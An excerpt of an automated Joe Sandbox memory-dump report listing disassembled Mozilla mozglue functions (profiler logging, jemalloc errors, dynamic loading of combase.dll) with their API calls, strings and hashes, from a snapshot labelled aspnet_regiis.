                                                                                                                                                                      • Part of subcall function 6C7D9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C7D9470
                                                                                                                                                                      • Part of subcall function 6C7D9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C7D9482
                                                                                                                                                                      • Part of subcall function 6C7D9420: __Init_thread_footer.LIBCMT ref: 6C7D949F
                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C7DF619
                                                                                                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,?,6C7DF598), ref: 6C7DF621
                                                                                                                                                                      • Part of subcall function 6C7D94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C7D94EE
                                                                                                                                                                      • Part of subcall function 6C7D94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C7D9508
                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C7DF637
                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(6C81F4B8,?,?,00000000,?,6C7DF598), ref: 6C7DF645
                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6C81F4B8,?,?,00000000,?,6C7DF598), ref: 6C7DF663
                                                                                                                                                                    Strings
                                                                                                                                                                    • [D %d/%d] profiler_remove_sampled_counter(%s), xrefs: 6C7DF62A
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Currentgetenv$ExclusiveLockProcessThread$AcquireInit_thread_footerReleaseTerminate__acrt_iob_func__stdio_common_vfprintf_getpid
                                                                                                                                                                    • String ID: [D %d/%d] profiler_remove_sampled_counter(%s)
                                                                                                                                                                    • API String ID: 1579816589-753366533
                                                                                                                                                                    • Opcode ID: 25255147dfd668e58bef835ac784677b93baa9921fb113c94b960b97abf3a936
                                                                                                                                                                    • Instruction ID: f82939d8e375473c345f54134cb644ee546eb4ca1b4c2a87e06b5d47fd28e9fa
                                                                                                                                                                    • Opcode Fuzzy Hash: 25255147dfd668e58bef835ac784677b93baa9921fb113c94b960b97abf3a936
                                                                                                                                                                    • Instruction Fuzzy Hash: C011E771204206AFCA14AF59CA4D9E677F9FB9636DF550435EA0683F01CB71B825CBE0
                                                                                                                                                                    Function 6C7A2070 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 68libraryloaderCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 6C7CAB89: EnterCriticalSection.KERNEL32(6C81E370,?,?,?,6C7934DE,6C81F6CC,?,?,?,?,?,?,?,6C793284), ref: 6C7CAB94
                                                                                                                                                                      • Part of subcall function 6C7CAB89: LeaveCriticalSection.KERNEL32(6C81E370,?,6C7934DE,6C81F6CC,?,?,?,?,?,?,?,6C793284,?,?,6C7B56F6), ref: 6C7CABD1
                                                                                                                                                                    • LoadLibraryW.KERNEL32(combase.dll,6C7A1C5F), ref: 6C7A20AE
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CoInitializeSecurity), ref: 6C7A20CD
                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 6C7A20E1
                                                                                                                                                                    • FreeLibrary.KERNEL32 ref: 6C7A2124
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CriticalLibrarySection$AddressEnterFreeInit_thread_footerLeaveLoadProc
                                                                                                                                                                    • String ID: CoInitializeSecurity$combase.dll
                                                                                                                                                                    • API String ID: 4190559335-2476802802
                                                                                                                                                                    • Opcode ID: 926399c9aa22c86df1a2985205217fe512502af01d1ca059f430e8d5b30207a3
                                                                                                                                                                    • Instruction ID: c54ef2658641e98d4dca5c15ba2435333a7a1db1b12b6f09b64d344468923517
                                                                                                                                                                    • Opcode Fuzzy Hash: 926399c9aa22c86df1a2985205217fe512502af01d1ca059f430e8d5b30207a3
                                                                                                                                                                    • Instruction Fuzzy Hash: AF21607520010AEFDF21CF96DE4DDDA3BB6FB5A369F104128FA0852A10D73198A2DF91
                                                                                                                                                                    Function 6C7F76C0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • WideCharToMultiByte.KERNEL32 ref: 6C7F76F2
                                                                                                                                                                    • moz_xmalloc.MOZGLUE(00000001), ref: 6C7F7705
                                                                                                                                                                      • Part of subcall function 6C7ACA10: malloc.MOZGLUE(?), ref: 6C7ACA26
                                                                                                                                                                    • memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6C7F7717
                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,6C7F778F,00000000,00000000,00000000,00000000), ref: 6C7F7731
                                                                                                                                                                    • free.MOZGLUE(00000000), ref: 6C7F7760
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ByteCharMultiWide$freemallocmemsetmoz_xmalloc
                                                                                                                                                                    • String ID: }>}l
                                                                                                                                                                    • API String ID: 2538299546-1215382799
                                                                                                                                                                    • Opcode ID: 2dcbe449f24e508d83549ec3155404fbb6dca8a26566dba9e6b8673bb379bb62
                                                                                                                                                                    • Instruction ID: 3a7213c1ad55d1882cd9f4fa06e83b447a56de76bb54f2d919a3b6d2d2a9631a
                                                                                                                                                                    • Opcode Fuzzy Hash: 2dcbe449f24e508d83549ec3155404fbb6dca8a26566dba9e6b8673bb379bb62
                                                                                                                                                                    • Instruction Fuzzy Hash: EE11C4B1904215ABE710AFBA9D45BABBEE8EF45354F044539F848E7700E7719840C7F2
                                                                                                                                                                    Function 6C7A1FA0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 60libraryloaderCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 6C7CAB89: EnterCriticalSection.KERNEL32(6C81E370,?,?,?,6C7934DE,6C81F6CC,?,?,?,?,?,?,?,6C793284), ref: 6C7CAB94
                                                                                                                                                                      • Part of subcall function 6C7CAB89: LeaveCriticalSection.KERNEL32(6C81E370,?,6C7934DE,6C81F6CC,?,?,?,?,?,?,?,6C793284,?,?,6C7B56F6), ref: 6C7CABD1
                                                                                                                                                                    • LoadLibraryW.KERNEL32(combase.dll,?), ref: 6C7A1FDE
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CoCreateInstance), ref: 6C7A1FFD
                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 6C7A2011
                                                                                                                                                                    • FreeLibrary.KERNEL32 ref: 6C7A2059
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CriticalLibrarySection$AddressEnterFreeInit_thread_footerLeaveLoadProc
                                                                                                                                                                    • String ID: CoCreateInstance$combase.dll
                                                                                                                                                                    • API String ID: 4190559335-2197658831
                                                                                                                                                                    • Opcode ID: b87a86226aaa10c6de0f5d3e0dbaf48bb131ea223690bc452c10cb94f9b62538
                                                                                                                                                                    • Instruction ID: 62097f6ec0477e7ff79733549442185af35ba66aba79ed77aec580143ccea24a
                                                                                                                                                                    • Opcode Fuzzy Hash: b87a86226aaa10c6de0f5d3e0dbaf48bb131ea223690bc452c10cb94f9b62538
                                                                                                                                                                    • Instruction Fuzzy Hash: D1115CB4205206AFDF30CF56CA4EE963BF9FB56369F004139E90882F40E7309811DBA1
                                                                                                                                                                    Function 6C7A0EE0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 51libraryloaderCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 6C7CAB89: EnterCriticalSection.KERNEL32(6C81E370,?,?,?,6C7934DE,6C81F6CC,?,?,?,?,?,?,?,6C793284), ref: 6C7CAB94
                                                                                                                                                                      • Part of subcall function 6C7CAB89: LeaveCriticalSection.KERNEL32(6C81E370,?,6C7934DE,6C81F6CC,?,?,?,?,?,?,?,6C793284,?,?,6C7B56F6), ref: 6C7CABD1
                                                                                                                                                                    • LoadLibraryW.KERNEL32(combase.dll,00000000,?,6C7CD9F0,00000000), ref: 6C7A0F1D
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 6C7A0F3C
                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 6C7A0F50
                                                                                                                                                                    • FreeLibrary.KERNEL32(?,6C7CD9F0,00000000), ref: 6C7A0F86
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CriticalLibrarySection$AddressEnterFreeInit_thread_footerLeaveLoadProc
                                                                                                                                                                    • String ID: CoInitializeEx$combase.dll
                                                                                                                                                                    • API String ID: 4190559335-2063391169
                                                                                                                                                                    • Opcode ID: 26867c3bacff1d485ec6ebd0648fcade2b49c8b37bd3f87c85131c57aac26e4a
                                                                                                                                                                    • Instruction ID: a6c8d85472ef606151e2da7f9766e1ce02771e4fb6e21025a1828335a563efde
                                                                                                                                                                    • Opcode Fuzzy Hash: 26867c3bacff1d485ec6ebd0648fcade2b49c8b37bd3f87c85131c57aac26e4a
                                                                                                                                                                    • Instruction Fuzzy Hash: 16115174705242DBDF20CF94CA0DE9637F5A75A32AF004A39F90AA2F40D730A406CBD5
                                                                                                                                                                    Function 6C7DF540 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36threadCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 6C7D9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C7A4A68), ref: 6C7D945E
                                                                                                                                                                      • Part of subcall function 6C7D9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C7D9470
                                                                                                                                                                      • Part of subcall function 6C7D9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C7D9482
                                                                                                                                                                      • Part of subcall function 6C7D9420: __Init_thread_footer.LIBCMT ref: 6C7D949F
                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C7DF559
                                                                                                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C7DF561
                                                                                                                                                                      • Part of subcall function 6C7D94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C7D94EE
                                                                                                                                                                      • Part of subcall function 6C7D94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C7D9508
                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C7DF577
                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(6C81F4B8), ref: 6C7DF585
                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6C81F4B8), ref: 6C7DF5A3
                                                                                                                                                                    Strings
                                                                                                                                                                    • [I %d/%d] profiler_pause_sampling, xrefs: 6C7DF3A8
                                                                                                                                                                    • [I %d/%d] profiler_resume, xrefs: 6C7DF239
                                                                                                                                                                    • [I %d/%d] profiler_resume_sampling, xrefs: 6C7DF499
                                                                                                                                                                    • [D %d/%d] profiler_add_sampled_counter(%s), xrefs: 6C7DF56A
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: getenv$CurrentExclusiveLockThread$AcquireInit_thread_footerRelease__acrt_iob_func__stdio_common_vfprintf_getpid
                                                                                                                                                                    • String ID: [D %d/%d] profiler_add_sampled_counter(%s)$[I %d/%d] profiler_pause_sampling$[I %d/%d] profiler_resume$[I %d/%d] profiler_resume_sampling
                                                                                                                                                                    • API String ID: 2848912005-2840072211
                                                                                                                                                                    • Opcode ID: 3b0e8d83d3acf5e463d6a7e995dea7effd087304f98e6fa0f4e969fee69e36f0
                                                                                                                                                                    • Instruction ID: 35d5fa12ad45d0d3bfb7379c82570b6e521646e584cec1c4ab4aed1cb11262ba
                                                                                                                                                                    • Opcode Fuzzy Hash: 3b0e8d83d3acf5e463d6a7e995dea7effd087304f98e6fa0f4e969fee69e36f0
                                                                                                                                                                    • Instruction Fuzzy Hash: 4CF0B4B52002029FDA206B65984EA6B7BFCEB962ADF010435FA0683F02DB715805C7E0
                                                                                                                                                                    Function 6C7A0E40 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36libraryloaderCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • LoadLibraryW.KERNEL32(kernel32.dll,6C7A0DF8), ref: 6C7A0E82
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetProcessMitigationPolicy), ref: 6C7A0EA1
                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 6C7A0EB5
                                                                                                                                                                    • FreeLibrary.KERNEL32 ref: 6C7A0EC5
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Library$AddressFreeInit_thread_footerLoadProc
                                                                                                                                                                    • String ID: GetProcessMitigationPolicy$kernel32.dll
                                                                                                                                                                    • API String ID: 391052410-1680159014
                                                                                                                                                                    • Opcode ID: 954cf48bfb057436b5d4719ec6c4885c32ba13fd3adbe04fcb8e4ef7f53ff2c6
                                                                                                                                                                    • Instruction ID: 9b3bfdaad647476855f657189fbf4c2bd8efc22b23694119d7a61ba60ed8553a
                                                                                                                                                                    • Opcode Fuzzy Hash: 954cf48bfb057436b5d4719ec6c4885c32ba13fd3adbe04fcb8e4ef7f53ff2c6
                                                                                                                                                                    • Instruction Fuzzy Hash: 070128747082C38BDB209FE8DA5AA5233FAE76731DF104E35D90782F60D770A405EA82
                                                                                                                                                                    Function 6C7DF600 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36threadCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 6C7D9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C7A4A68), ref: 6C7D945E
                                                                                                                                                                      • Part of subcall function 6C7D9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C7D9470
                                                                                                                                                                      • Part of subcall function 6C7D9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C7D9482
                                                                                                                                                                      • Part of subcall function 6C7D9420: __Init_thread_footer.LIBCMT ref: 6C7D949F
                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C7DF619
                                                                                                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,?,6C7DF598), ref: 6C7DF621
                                                                                                                                                                      • Part of subcall function 6C7D94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C7D94EE
                                                                                                                                                                      • Part of subcall function 6C7D94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C7D9508
                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C7DF637
                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(6C81F4B8,?,?,00000000,?,6C7DF598), ref: 6C7DF645
                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6C81F4B8,?,?,00000000,?,6C7DF598), ref: 6C7DF663
                                                                                                                                                                    Strings
                                                                                                                                                                    • [D %d/%d] profiler_remove_sampled_counter(%s), xrefs: 6C7DF62A
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: getenv$CurrentExclusiveLockThread$AcquireInit_thread_footerRelease__acrt_iob_func__stdio_common_vfprintf_getpid
                                                                                                                                                                    • String ID: [D %d/%d] profiler_remove_sampled_counter(%s)
                                                                                                                                                                    • API String ID: 2848912005-753366533
                                                                                                                                                                    • Opcode ID: 55447f3c88d14000ecb80336e7eed6be4bfe256ba8c88633a65356fbd457c479
                                                                                                                                                                    • Instruction ID: 9d236dfc7cd079d21e379f6138c2b3356a651ccbaee0bf2e7e17ff764419db79
                                                                                                                                                                    • Opcode Fuzzy Hash: 55447f3c88d14000ecb80336e7eed6be4bfe256ba8c88633a65356fbd457c479
                                                                                                                                                                    • Instruction Fuzzy Hash: 5EF0B4B5200202AFDA206B65884EA6B7BFCEB962ADF050435FA0583F02CB355C05C7B0
                                                                                                                                                                    Function 6C7D05F0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 31stringCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(<jemalloc>,?,?,?,?,6C7CCFAE,?,?,?,6C7931A7), ref: 6C7D05FB
                                                                                                                                                                    • _write.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,<jemalloc>,00000000,6C7CCFAE,?,?,?,6C7931A7), ref: 6C7D0616
                                                                                                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(: (malloc) Error in VirtualFree(),?,?,?,?,?,?,?,6C7931A7), ref: 6C7D061C
                                                                                                                                                                    • _write.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,: (malloc) Error in VirtualFree(),00000000,?,?,?,?,?,?,?,?,6C7931A7), ref: 6C7D0627
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: _writestrlen
                                                                                                                                                                    • String ID: : (malloc) Error in VirtualFree()$<jemalloc>
                                                                                                                                                                    • API String ID: 2723441310-2186867486
                                                                                                                                                                    • Opcode ID: 95726af5bffbdf5bb56bf757b9e3bc9c319429214b426d64d8b080789c297487
                                                                                                                                                                    • Instruction ID: 544c5d105342aa7708acd5d27da7b526a3c7cad3694f616db662bc29d004cc50
                                                                                                                                                                    • Opcode Fuzzy Hash: 95726af5bffbdf5bb56bf757b9e3bc9c319429214b426d64d8b080789c297487
                                                                                                                                                                    • Instruction Fuzzy Hash: 93E08CE2A1101037F524225AAC87EBB765CDBC6138F09003DFD0D83302E94AAD1A91F7
                                                                                                                                                                    Function 6C7A05F0 Relevance: 9.2, APIs: 6, Instructions: 226COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 42d9c792427584e92dc860b167cf6e26af8c896f04cdf1cef5757bdf495bb8e1
                                                                                                                                                                    • Instruction ID: efbbbfc2d614c118ab1b3ce23a30cbb6b192891611d3d32438d1c6d9f71606e4
                                                                                                                                                                    • Opcode Fuzzy Hash: 42d9c792427584e92dc860b167cf6e26af8c896f04cdf1cef5757bdf495bb8e1
                                                                                                                                                                    • Instruction Fuzzy Hash: F8A149B0A00645CFDB24CF69C684B9AFBF1BF49304F448A6ED44A97B01E730A946CF90
                                                                                                                                                                    Function 6C7F14A0 Relevance: 9.2, APIs: 6, Instructions: 176threadtimeCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C7F14C5
                                                                                                                                                                    • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C7F14E2
                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C7F1546
                                                                                                                                                                    • InitializeConditionVariable.KERNEL32(?), ref: 6C7F15BA
                                                                                                                                                                    • free.MOZGLUE(?), ref: 6C7F16B4
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CurrentThread$ConditionInitializeNow@Stamp@mozilla@@TimeV12@_Variablefree
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1909280232-0
                                                                                                                                                                    • Opcode ID: e02bd38c299d1f43c0aada6eb4c09a3a329bfcbae63deb6e528e14e59d03f19b
                                                                                                                                                                    • Instruction ID: d9faa21e540a1adb3c74399d59e3d8f56a5591d111baea9309bbed70fc52008f
